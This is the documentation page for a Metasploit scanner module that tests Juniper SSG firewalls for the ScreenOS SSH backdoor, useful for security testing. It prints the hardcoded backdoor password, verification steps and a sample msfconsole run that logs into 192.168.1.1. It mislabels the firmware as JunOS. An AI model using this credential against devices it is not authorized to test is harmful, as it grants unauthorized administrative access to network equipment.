CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

Vulnerable Application

Juniper JunOS between 6.2.0r15 to 6.2.0r18 and 6.3.0r12 to 6.3.0r20 are vulnerable.

A vulnerable copy of the firmware is available for a Juiper SSG5/SSG20 (v6.3.0r19.0): here

For verification purposes, an example vuln python script is also available here

Verification Steps

1. Install the application

2. Start msfconsole

3. Do: use auxiliary/scanner/ssh/juniper_backdoor

4. Do: set rhosts

5. Do: run

6. You should see: [+] 192.168.1.1:22 - Logged in with backdoor account admin:<<< %s(un='%s') = %u

Scenarios

Example run against a Juniper SSG5 with vuln firmware from above link.

msf > use auxiliary/scanner/ssh/juniper_backdoor
msf auxiliary(juniper_backdoor) > set rhosts 192.168.1.1
rhosts => 192.168.1.1
msf auxiliary(juniper_backdoor) > set verbose true
verbose => true
msf auxiliary(juniper_backdoor) > run

[+] 192.168.1.1:22 - Logged in with backdoor account admin:<<< %s(un='%s') = %u
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed